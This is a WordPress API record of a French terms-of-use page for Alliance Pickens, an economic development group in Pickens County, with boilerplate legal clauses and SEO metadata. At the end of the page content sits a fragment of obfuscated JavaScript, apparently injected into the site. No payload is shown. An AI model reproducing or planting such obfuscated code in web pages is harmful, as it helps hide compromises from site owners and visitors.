{"id":7101,"date":"2020-10-28T14:33:00","date_gmt":"2020-10-28T14:33:00","guid":{"rendered":"http:\/\/alliancepickens.com\/conditions-generales\/"},"modified":"2020-12-04T17:53:00","modified_gmt":"2020-12-04T17:53:00","slug":"conditions-generales","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/fr\/conditions-generales\/","title":{"rendered":"Conditions g\u00e9n\u00e9rales"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Derni\u00e8re mise \u00e0 jour :  December 4, 2020<\/p>\n<p>Veuillez lire attentivement les pr\u00e9sentes Conditions d\u2019utilisation (\u00ab Conditions \u00bb, \u00ab Conditions d\u2019utilisation \u00bb) avant d\u2019utiliser le http:\/\/alliancepickens.com site Web (le \u00ab Service \u00bb) exploit\u00e9 par Alliance Pickens (\u00ab ou \u00bb, \u00ab ou \u00bb, ou \u00ab o \u00bb).<\/p>\n<p>Votre acc\u00e8s et votre utilisation du Service sont conditionn\u00e9s \u00e0 votre acceptation et \u00e0 votre conformit\u00e9 aux pr\u00e9sentes Conditions. Ces conditions s\u2019appliquent \u00e0 tous les visiteurs, utilisateurs et autres personnes qui acc\u00e8dent au Service ou qui l\u2019utilisent.<\/p>\n<p>En acc\u00e9dant ou en utilisant le Service, vous acceptez d\u2019\u00eatre li\u00e9 par ces Conditions. Si vous n\u2019\u00eates pas d\u2019accord avec une partie quelconque des termes, vous ne pouvez pas acc\u00e9der au Service.<\/p>\n<h3>Propri\u00e9t\u00e9 intellectuelle<\/h3>\n<p>Le Service et son contenu, ses fonctionnalit\u00e9s et ses fonctionnalit\u00e9s d\u2019origine sont et resteront la propri\u00e9t\u00e9 exclusive de ses conc\u00e9dants et de Alliance Pickens ses conc\u00e9dants.<\/p>\n<h3>Liens vers d\u2019autres sites Web<\/h3>\n<p>Notre Service peut contenir des liens vers des sites Web tiers ou des services qui ne sont pas d\u00e9tenus ou contr\u00f4l\u00e9s par Alliance Pickens .<\/p>\n<p>Alliance Pickens  n\u2019a aucun contr\u00f4le sur le contenu, les politiques ou les pratiques d\u2019un tiers ou de ses pratiques et n\u2019assume aucune responsabilit\u00e9 \u00e0 l\u2019\u00e9gard du contenu, des politiques de confidentialit\u00e9 ou des pratiques d\u2019un site ou de services Web tiers. Vous reconnaissez et convenez en outre que  Alliance Pickens  n\u2019est pas responsable ou responsable, directement ou indirectement, des dommages ou pertes caus\u00e9s ou pr\u00e9sum\u00e9s caus\u00e9s par ou en relation avec l\u2019utilisation ou la d\u00e9pendance \u00e0 l\u2019\u00e9gard de ces contenus, biens ou services disponibles sur ou par l\u2019interm\u00e9diaire de tels sites Ou services Web.<\/p>\n<p>Nous vous conseillons fortement de lire les termes et conditions et les politiques de confidentialit\u00e9 de tous les sites Web ou services tiers que vous visitez.<\/p>\n<h3>R\u00e9siliation<\/h3>\n<p>Nous pouvons r\u00e9silier ou suspendre imm\u00e9diatement l\u2019acc\u00e8s \u00e0 notre Service, sans pr\u00e9avis ni responsabilit\u00e9, pour quelque raison que ce soit, y compris sans limitation si vous enfreignez les Conditions.<\/p>\n<p>Toutes les dispositions des Conditions qui, de par leur nature, devraient survivre \u00e0 la r\u00e9siliation, y compris, sans limitation, les dispositions relatives \u00e0 la propri\u00e9t\u00e9, les clauses de non-responsabilit\u00e9, l\u2019indemnisation et les limitations de responsabilit\u00e9.<\/p>\n<h3>Avertissement<\/h3>\n<p>Votre utilisation du Service est \u00e0 votre seul risque. Le Service est fourni sur la base \u00ab AS IS \u00bb et \u00ab AS AVAILABLE \u00bb. Le Service est fourni sans garanties de quelque nature que ce soit, qu\u2019elles soient expresses ou implicites, y compris, mais sans s\u2019y limiter, des garanties implicites de marchandabilit\u00e9, d\u2019aptitude \u00e0 un but particulier, de non-violation ou de cours d\u2019ex\u00e9cution.<\/p>\n<h3>Droit directeur<\/h3>\n<p>Les pr\u00e9sentes conditions sont r\u00e9gies et interpr\u00e9t\u00e9es conform\u00e9ment aux lois des \u00c9tats-Unis sans \u00e9gard aux dispositions relatives \u00e0 ses conflits de droit.<\/p>\n<p>Notre omission d\u2019appliquer un droit ou une disposition de ces Conditions ne sera pas consid\u00e9r\u00e9e comme une renonciation \u00e0 ces droits. Si une disposition de ces Conditions est jug\u00e9e invalide ou inapplicable par un tribunal, les dispositions restantes des pr\u00e9sentes Conditions demeureront en vigueur. Ces Conditions constituent l\u2019accord complet entre nous concernant notre Service, et remplacent et remplacent toutes les ententes ant\u00e9rieures que nous pourrions avoir entre nous concernant le Service.<\/p>\n<h3>Changements<\/h3>\n<p>Nous nous r\u00e9servons le droit, \u00e0 notre seule discr\u00e9tion, de modifier ou de remplacer ces Conditions \u00e0 tout moment. Si une r\u00e9vision est importante, nous essayerons de fournir un pr\u00e9avis d\u2019au moins 30 jours avant l\u2019entr\u00e9e en vigueur de nouvelles conditions. Ce qui constitue un changement important sera d\u00e9termin\u00e9 \u00e0 notre seule discr\u00e9tion.<\/p>\n<p>En continuant d\u2019acc\u00e9der \u00e0 notre Service ou d\u2019utiliser notre service apr\u00e8s l\u2019entr\u00e9e en vigueur de ces r\u00e9visions, vous acceptez d\u2019\u00eatre li\u00e9 par les conditions r\u00e9vis\u00e9es. Si vous n\u2019acceptez pas les nouvelles conditions, veuillez cesser d\u2019utiliser le Service.<\/p>\n<h3>Contactez-nous<\/h3>\n<p>Si vous avez des questions sur ces Conditions, veuillez <a href=\"http:\/\/alliancepickens.com\/fr\/qui-sommes-nous\/#contact_directions\">nous contacter<\/a>.[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Pr\u00eat \u00e0 commencer?<\/h1>\n<h3>Nous sommes impatients de vous parler!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Contactez notre \u00e9quipe<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Derni\u00e8re mise \u00e0 jour : Veuillez lire attentivement les pr\u00e9sentes Conditions d\u2019utilisation (\u00ab Conditions \u00bb, \u00ab Conditions d\u2019utilisation \u00bb) avant d\u2019utiliser le site Web (le \u00ab Service \u00bb) exploit\u00e9 par (\u00ab ou \u00bb, \u00ab ou \u00bb, ou \u00ab o \u00bb). Votre acc\u00e8s et votre utilisation du Service sont conditionn\u00e9s \u00e0 votre acceptation et \u00e0&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-7101","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Conditions g\u00e9n\u00e9rales - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/fr\/conditions-generales\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Conditions g\u00e9n\u00e9rales - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Derni\u00e8re mise \u00e0 jour : Veuillez lire attentivement les pr\u00e9sentes Conditions d\u2019utilisation (\u00ab Conditions \u00bb, \u00ab Conditions d\u2019utilisation \u00bb) avant d\u2019utiliser le site Web (le \u00ab Service \u00bb) exploit\u00e9 par (\u00ab ou \u00bb, \u00ab ou \u00bb, ou \u00ab o \u00bb). Votre acc\u00e8s et votre utilisation du Service sont conditionn\u00e9s \u00e0 votre acceptation et \u00e0&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/fr\/conditions-generales\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T17:53:00+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/conditions-generales\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/conditions-generales\\\/\",\"name\":\"Conditions g\u00e9n\u00e9rales - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#website\"},\"datePublished\":\"2020-10-28T14:33:00+00:00\",\"dateModified\":\"2020-12-04T17:53:00+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/conditions-generales\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/conditions-generales\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/conditions-generales\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Conditions g\u00e9n\u00e9rales\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Conditions g\u00e9n\u00e9rales - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/fr\/conditions-generales\/","og_locale":"fr_FR","og_type":"article","og_title":"Conditions g\u00e9n\u00e9rales - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Derni\u00e8re mise \u00e0 jour : Veuillez lire attentivement les pr\u00e9sentes Conditions d\u2019utilisation (\u00ab Conditions \u00bb, \u00ab Conditions d\u2019utilisation \u00bb) avant d\u2019utiliser le site Web (le \u00ab Service \u00bb) exploit\u00e9 par (\u00ab ou \u00bb, \u00ab ou \u00bb, ou \u00ab o \u00bb). Votre acc\u00e8s et votre utilisation du Service sont conditionn\u00e9s \u00e0 votre acceptation et \u00e0&hellip;","og_url":"https:\/\/alliancepickens.com\/fr\/conditions-generales\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T17:53:00+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/fr\/conditions-generales\/","url":"https:\/\/alliancepickens.com\/fr\/conditions-generales\/","name":"Conditions g\u00e9n\u00e9rales - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/fr\/#website"},"datePublished":"2020-10-28T14:33:00+00:00","dateModified":"2020-12-04T17:53:00+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/fr\/conditions-generales\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/fr\/conditions-generales\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/fr\/conditions-generales\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/fr\/"},{"@type":"ListItem","position":2,"name":"Conditions g\u00e9n\u00e9rales"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/fr\/#website","url":"https:\/\/alliancepickens.com\/fr\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages\/7101","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/comments?post=7101"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages\/7101\/revisions"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/media?parent=7101"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}